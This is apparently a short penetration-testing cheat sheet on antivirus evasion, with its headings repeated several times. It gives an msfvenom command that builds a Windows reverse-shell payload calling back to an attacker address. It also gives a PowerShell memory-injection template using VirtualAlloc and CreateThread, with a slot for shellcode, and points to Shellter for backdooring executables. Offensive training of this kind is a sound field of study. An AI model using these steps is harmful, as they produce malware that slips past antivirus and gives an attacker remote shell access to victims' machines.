Antivirus Evasion Techniques

Evading AV with Thread Injection

Step 1. Generate Payload using msfvenom (for 32 bit powershell)

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f psh-reflection

Step 2. Put the payload in this memory injection template

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

<place shellcode here>

Using SHELTER

Step1. Download any 32 bit exe file/application software.

📚 References

DarkOperator - Goor reference for powershell scripts

Evading AV with Thread Injection​

Step 1. Generate Payload using msfvenom (for 32 bit powershell)​

Step 2. Put the payload in this memory injection template​

Using SHELTER​

Step1. Download any 32 bit exe file/application software.​

📚 References​

Evading AV with Thread Injection

Step 1. Generate Payload using msfvenom (for 32 bit powershell)

Step 2. Put the payload in this memory injection template

Using SHELTER

Step1. Download any 32 bit exe file/application software.

📚 References